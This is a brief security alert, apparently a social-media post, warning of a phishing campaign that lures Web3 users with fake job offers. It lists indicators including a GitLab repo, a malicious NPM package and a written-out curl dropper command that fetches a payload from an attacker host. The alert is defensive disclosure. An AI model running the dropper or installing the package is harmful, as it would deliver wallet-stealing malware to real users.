🚨 Security TI Alert 🚨 According to community partner @1nf0s3cpt, an active phishing campaign is targeting Web3 users with fake job offers (e.g. 120/hour) to trick them into executing a malicious script that steals wallet files. 🔍 Key IOCs: 🔸GitLab repo: https://gitlab.com/workspace935/web3-game-platform 🔸Dropper: curl https://bs-production.up.railway.app/on -H "x-secret-key: _" 🧪 The attack method is very similar to the previous Lazarus use of NPM packages to spread malicious code: https://socket.dev/blog/lazarus-strikes-npm-again-with-a-new-wave-of-malicious-packages 🚨 We found that a new malicious NPM package was just published: https://www.npmjs.com/package/react-hook-form-ui 🔸Likely linked GitHub: apollo-hero 🔸Uploader email: skelstar125@gmail.com ⚠️ Do NOT install or run unknown packages or scripts. Always verify sources. #LAZARUS #Phishing